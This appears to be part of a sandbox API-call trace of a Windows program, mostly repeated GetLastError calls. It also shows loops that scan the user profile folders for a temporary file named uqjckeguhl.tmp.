	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.796] GetLastError () returned 0x7a
	[0128.796] GetLastError () returned 0x7a
	[0128.796] GetLastError () returned 0x7a
	[0128.796] GetLastError () returned 0x7a
	[0128.796] GetLastError () returned 0x7a
	[0128.796] GetLastError () returned 0x7a
	[0128.796] GetLastError () returned 0x7a
	[0128.796] GetLastError () returned 0x7a
	[0128.796] GetLastError () returned 0x7a
	[0128.796] GetLastError () returned 0x7a
	[0128.796] GetLastError () returned 0x7a
	[0128.796] GetLastError () returned 0x7a
	[0128.796] GetLastError () returned 0x7a
	[0128.796] GetLastError () returned 0x7a
	[0128.796] GetLastError () returned 0x7a
	[0128.796] GetLastError () returned 0x7a
	[0128.796] GetLastError () returned 0x7a
	[0128.796] GetLastError () returned 0x7a
	[0128.796] GetLastError () returned 0x7a
	[0128.796] GetLastError () returned 0x7a
	[0128.796] GetLastError () returned 0x7a
	[0128.796] GetLastError () returned 0x7a
	[0128.796] GetLastError () returned 0x7a
	[0128.796] GetLastError () returned 0x7a
	[0128.796] GetLastError () returned 0x7a
	[0128.796] GetLastError () returned 0x7a
	[0128.796] GetLastError () returned 0x7a
	[0128.796] GetLastError () returned 0x7a
	[0128.796] GetLastError () returned 0x7a
	[0128.796] GetLastError () returned 0x7a
	[0128.796] GetLastError () returned 0x7a
	[0128.796] GetLastError () returned 0x7a
	[0128.796] GetLastError () returned 0x7a
	[0128.796] GetLastError () returned 0x7a
	[0128.796] GetLastError () returned 0x7a
	[0128.796] GetLastError () returned 0x7a
	[0128.796] GetLastError () returned 0x7a
	[0128.796] GetLastError () returned 0x7a
	[0128.796] GetLastError () returned 0x7a
	[0128.796] GetLastError () returned 0x7a
	[0128.796] GetLastError () returned 0x7a
	[0128.796] GetLastError () returned 0x7a
	[0128.796] GetLastError () returned 0x7a
	[0128.796] GetLastError () returned 0x7a
	[0128.796] GetLastError () returned 0x7a
	[0128.796] GetLastError () returned 0x7a
	[0128.796] GetLastError () returned 0x7a
	[0128.796] GetLastError () returned 0x7a
	[0128.796] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.797] GetLastError () returned 0x7a
	[0128.798] GetLastError () returned 0x7a
	[0128.798] GetLastError () returned 0x7a
	[0128.798] GetLastError () returned 0x7a
	[0128.798] GetLastError () returned 0x7a
	[0128.798] GetLastError () returned 0x7a
	[0128.798] GetLastError () returned 0x7a
	[0128.798] GetLastError () returned 0x7a
	[0128.798] wsprintfW (in: param_1=0x68b1c0, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\All Users\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 52
	[0128.798] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\all users\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0128.799] GetLastError () returned 0x3
	[0128.799] GetLastError () returned 0x3
	[0128.799] GetLastError () returned 0x3
	[0128.799] GetLastError () returned 0x3
	[0128.799] GetLastError () returned 0x3
	[0128.799] GetLastError () returned 0x3
	[0128.799] GetLastError () returned 0x3
	[0128.799] GetLastError () returned 0x3
	[0128.799] GetLastError () returned 0x3
	[0128.799] GetLastError () returned 0x3
	[0128.799] GetLastError () returned 0x3
	[0128.799] GetLastError () returned 0x3
	[0128.799] GetLastError () returned 0x3
	[0128.799] GetLastError () returned 0x3
	[0128.799] GetLastError () returned 0x3
	[0128.799] GetLastError () returned 0x3
	[0128.799] GetLastError () returned 0x3
	[0128.799] GetLastError () returned 0x3
	[0128.799] GetLastError () returned 0x3
	[0128.799] GetLastError () returned 0x3
	[0128.799] GetLastError () returned 0x3
	[0128.799] GetLastError () returned 0x3
	[0128.799] GetLastError () returned 0x3
	[0128.799] GetLastError () returned 0x3
	[0128.799] GetLastError () returned 0x3
	[0128.799] GetLastError () returned 0x3
	[0128.799] GetLastError () returned 0x3
	[0128.799] GetLastError () returned 0x3
	[0128.799] GetLastError () returned 0x3
	[0128.799] GetLastError () returned 0x3
	[0128.799] GetLastError () returned 0x3
	[0128.799] GetLastError () returned 0x3
	[0128.799] GetLastError () returned 0x3
	[0128.799] GetLastError () returned 0x3
	[0128.799] GetLastError () returned 0x3
	[0128.799] GetLastError () returned 0x3
	[0128.799] GetLastError () returned 0x3
	[0128.799] GetLastError () returned 0x3
	[0128.799] GetLastError () returned 0x3
	[0128.799] GetLastError () returned 0x3
	[0128.799] GetLastError () returned 0x3
	[0128.799] GetLastError () returned 0x3
	[0128.799] GetLastError () returned 0x3
	[0128.799] GetLastError () returned 0x3
	[0128.799] GetLastError () returned 0x3
	[0128.799] GetLastError () returned 0x3
	[0128.800] GetLastError () returned 0x3
	[0128.800] GetLastError () returned 0x3
	[0128.800] GetLastError () returned 0x3
	[0128.800] GetLastError () returned 0x3
	[0128.800] GetLastError () returned 0x3
	[0128.800] GetLastError () returned 0x3
	[0128.800] GetLastError () returned 0x3
	[0128.800] GetLastError () returned 0x3
	[0128.800] GetLastError () returned 0x3
	[0128.800] GetLastError () returned 0x3
	[0128.800] GetLastError () returned 0x3
	[0128.800] GetLastError () returned 0x3
	[0128.800] GetLastError () returned 0x3
	[0128.800] GetLastError () returned 0x3
	[0128.800] GetLastError () returned 0x3
	[0128.800] GetLastError () returned 0x3
	[0128.800] GetLastError () returned 0x3
	[0128.800] GetLastError () returned 0x3
	[0128.800] GetLastError () returned 0x3
	[0128.800] GetLastError () returned 0x3
	[0128.800] GetLastError () returned 0x3
	[0128.800] GetLastError () returned 0x3
	[0128.800] GetLastError () returned 0x3
	[0128.800] GetLastError () returned 0x3
	[0128.800] GetLastError () returned 0x3
	[0128.800] GetLastError () returned 0x3
	[0128.800] GetLastError () returned 0x3
	[0128.800] GetLastError () returned 0x3
	[0128.800] GetLastError () returned 0x3
	[0128.800] GetLastError () returned 0x3
	[0128.800] GetLastError () returned 0x3
	[0128.800] GetLastError () returned 0x3
	[0128.800] GetLastError () returned 0x3
	[0128.800] GetLastError () returned 0x3
	[0128.800] GetLastError () returned 0x3
	[0128.800] GetLastError () returned 0x3
	[0128.800] GetLastError () returned 0x3
	[0128.800] GetLastError () returned 0x3
	[0128.800] GetLastError () returned 0x3
	[0128.800] GetLastError () returned 0x3
	[0128.800] GetLastError () returned 0x3
	[0128.800] GetLastError () returned 0x3
	[0128.800] GetLastError () returned 0x3
	[0128.800] GetLastError () returned 0x3
	[0128.800] GetLastError () returned 0x3
	[0128.800] GetLastError () returned 0x3
	[0128.800] GetLastError () returned 0x3
	[0128.800] GetLastError () returned 0x3
	[0128.800] GetLastError () returned 0x3
	[0128.800] GetLastError () returned 0x3
	[0128.800] wsprintfW (in: param_1=0x68b1c0, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\All Users\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 53
	[0128.800] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\all users\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0128.801] FindNextFileW (in: hFindFile=0x396c958, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0128.801] GetLastError () returned 0x3
	[0128.801] GetLastError () returned 0x3
	[0128.801] GetLastError () returned 0x3
	[0128.801] GetLastError () returned 0x3
	[0128.801] GetLastError () returned 0x3
	[0128.801] GetLastError () returned 0x3
	[0128.801] GetLastError () returned 0x3
	[0128.801] GetLastError () returned 0x3
	[0128.801] GetLastError () returned 0x3
	[0128.801] GetLastError () returned 0x3
	[0128.801] GetLastError () returned 0x3
	[0128.801] GetLastError () returned 0x3
	[0128.801] GetLastError () returned 0x3
	[0128.801] GetLastError () returned 0x3
	[0128.801] GetLastError () returned 0x3
	[0128.801] GetLastError () returned 0x3
	[0128.801] GetLastError () returned 0x3
	[0128.801] GetLastError () returned 0x3
	[0128.801] GetLastError () returned 0x3
	[0128.801] GetLastError () returned 0x3
	[0128.801] lstrcmpW (lpString1="Default", lpString2=".") returned 1
	[0128.801] lstrcmpW (lpString1="Default", lpString2="..") returned 1
	[0128.802] GetLastError () returned 0x3
	[0128.802] GetLastError () returned 0x3
	[0128.802] GetLastError () returned 0x3
	[0128.802] GetLastError () returned 0x3
	[0128.802] GetLastError () returned 0x3
	[0128.802] GetLastError () returned 0x3
	[0128.802] GetLastError () returned 0x3
	[0128.802] GetLastError () returned 0x3
	[0128.802] GetLastError () returned 0x3
	[0128.802] GetLastError () returned 0x3
	[0128.802] GetLastError () returned 0x3
	[0128.802] GetLastError () returned 0x3
	[0128.802] GetLastError () returned 0x3
	[0128.802] GetLastError () returned 0x3
	[0128.802] GetLastError () returned 0x3
	[0128.802] GetLastError () returned 0x3
	[0128.802] GetLastError () returned 0x3
	[0128.802] GetLastError () returned 0x3
	[0128.802] GetLastError () returned 0x3
	[0128.802] GetLastError () returned 0x3
	[0128.802] GetLastError () returned 0x3
	[0128.802] GetLastError () returned 0x3
	[0128.802] GetLastError () returned 0x3
	[0128.802] GetLastError () returned 0x3
	[0128.802] GetLastError () returned 0x3
	[0128.802] GetLastError () returned 0x3
	[0128.802] GetLastError () returned 0x3
	[0128.802] GetLastError () returned 0x3
	[0128.802] GetLastError () returned 0x3
	[0128.802] GetLastError () returned 0x3
	[0128.802] GetLastError () returned 0x3
	[0128.802] GetLastError () returned 0x3
	[0128.802] GetLastError () returned 0x3
	[0128.802] GetLastError () returned 0x3
	[0128.802] GetLastError () returned 0x3
	[0128.802] GetLastError () returned 0x3
	[0128.802] GetLastError () returned 0x3
	[0128.802] GetLastError () returned 0x3
	[0128.802] GetLastError () returned 0x3
	[0128.802] GetLastError () returned 0x3
	[0128.802] GetLastError () returned 0x3
	[0128.802] GetLastError () returned 0x3
	[0128.802] GetLastError () returned 0x3
	[0128.802] GetLastError () returned 0x3
	[0128.802] GetLastError () returned 0x3
	[0128.802] GetLastError () returned 0x3
	[0128.802] GetLastError () returned 0x3
	[0128.802] GetLastError () returned 0x3
	[0128.802] GetLastError () returned 0x3
	[0128.802] GetLastError () returned 0x3
	[0128.803] wsprintfW (in: param_1=0x68b1c0, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 50
	[0128.803] GetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0128.804] wsprintfW (in: param_1=0x68b1c0, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 51
	[0128.804] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0128.806] FindNextFileW (in: hFindFile=0x396c958, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0128.806] wsprintfW (in: param_1=0x68b1c0, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default User\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 55
	[0128.807] GetFileAttributesW (lpFileName="C:\\Users\\Default User\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default user\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0128.808] wsprintfW (in: param_1=0x68b1c0, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default User\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 56
	[0128.808] GetFileAttributesW (lpFileName="C:\\Users\\Default User\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default user\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0128.809] FindNextFileW (in: hFindFile=0x396c958, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0128.809] FindNextFileW (in: hFindFile=0x396c958, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0128.809] wsprintfW (in: param_1=0x68b1c0, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 51
	[0128.809] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0128.810] wsprintfW (in: param_1=0x68b1c0, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Nd9E1FYi\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 52
	[0128.810] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\nd9e1fyi\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0128.810] FindNextFileW (in: hFindFile=0x396c958, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0128.811] wsprintfW (in: param_1=0x68b1c0, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Public\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 49
	[0128.811] GetFileAttributesW (lpFileName="C:\\Users\\Public\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\public\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0128.811] wsprintfW (in: param_1=0x68b1c0, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Public\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 50
	[0128.811] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\public\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0128.811] FindNextFileW (in: hFindFile=0x396c958, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 0
	[0128.811] FindClose (in: hFindFile=0x396c958 | out: hFindFile=0x396c958) returned 1
	[0133.838] GetProfilesDirectoryW () returned 0x0
	[0133.839] GetProfilesDirectoryW () returned 0x1
	[0133.840] FindFirstFileW (in: lpFileName="C:\\Users\\*.*", lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 0x396c958
	[0133.841] FindNextFileW (in: hFindFile=0x396c958, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0133.841] FindNextFileW (in: hFindFile=0x396c958, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0133.841] wsprintfW (in: param_1=0x68ba60, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\All Users\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 52
	[0133.841] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\all users\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0133.842] wsprintfW (in: param_1=0x68ba60, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\All Users\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 53
	[0133.842] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\all users\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0133.843] FindNextFileW (in: hFindFile=0x396c958, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0133.843] wsprintfW (in: param_1=0x68ba60, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 50
	[0133.843] GetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0133.845] wsprintfW (in: param_1=0x68ba60, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 51
	[0133.845] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0133.846] FindNextFileW (in: hFindFile=0x396c958, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0133.846] wsprintfW (in: param_1=0x68ba60, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default User\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 55
	[0133.846] GetFileAttributesW (lpFileName="C:\\Users\\Default User\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default user\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0133.848] wsprintfW (in: param_1=0x68ba60, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default User\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 56
	[0133.848] GetFileAttributesW (lpFileName="C:\\Users\\Default User\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default user\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0133.849] FindNextFileW (in: hFindFile=0x396c958, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0133.849] FindNextFileW (in: hFindFile=0x396c958, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0133.849] wsprintfW (in: param_1=0x68ba60, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 51
	[0133.849] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0133.850] wsprintfW (in: param_1=0x68ba60, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Nd9E1FYi\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 52
	[0133.850] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\nd9e1fyi\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0133.850] FindNextFileW (in: hFindFile=0x396c958, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0133.850] wsprintfW (in: param_1=0x68ba60, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Public\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 49
	[0133.850] GetFileAttributesW (lpFileName="C:\\Users\\Public\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\public\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0133.851] wsprintfW (in: param_1=0x68ba60, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Public\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 50
	[0133.851] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\public\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0133.851] FindNextFileW (in: hFindFile=0x396c958, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 0
	[0133.851] FindClose (in: hFindFile=0x396c958 | out: hFindFile=0x396c958) returned 1
	[0140.073] GetProfilesDirectoryW () returned 0x0
	[0140.074] GetProfilesDirectoryW () returned 0x1
	[0140.074] FindFirstFileW (in: lpFileName="C:\\Users\\*.*", lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 0x396ca58
	[0140.076] FindNextFileW (in: hFindFile=0x396ca58, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0140.076] FindNextFileW (in: hFindFile=0x396ca58, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0140.076] wsprintfW (in: param_1=0x68b838, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\All Users\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 52
	[0140.076] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\all users\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0140.077] wsprintfW (in: param_1=0x68b838, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\All Users\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 53
	[0140.078] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\all users\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0140.078] FindNextFileW (in: hFindFile=0x396ca58, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0140.078] wsprintfW (in: param_1=0x68b838, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 50
	[0140.078] GetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0140.080] wsprintfW (in: param_1=0x68b838, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 51
	[0140.080] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0140.081] FindNextFileW (in: hFindFile=0x396ca58, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0140.081] wsprintfW (in: param_1=0x68b838, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default User\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 55
	[0140.081] GetFileAttributesW (lpFileName="C:\\Users\\Default User\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default user\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0140.083] wsprintfW (in: param_1=0x68b838, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default User\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 56
	[0140.083] GetFileAttributesW (lpFileName="C:\\Users\\Default User\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default user\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0140.084] FindNextFileW (in: hFindFile=0x396ca58, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0140.084] FindNextFileW (in: hFindFile=0x396ca58, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0140.084] wsprintfW (in: param_1=0x68b838, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 51
	[0140.084] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0140.085] wsprintfW (in: param_1=0x68b838, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Nd9E1FYi\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 52
	[0140.085] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\nd9e1fyi\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0140.086] FindNextFileW (in: hFindFile=0x396ca58, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0140.086] wsprintfW (in: param_1=0x68b838, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Public\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 49
	[0140.086] GetFileAttributesW (lpFileName="C:\\Users\\Public\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\public\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0140.086] wsprintfW (in: param_1=0x68b838, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Public\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 50
	[0140.086] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\public\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
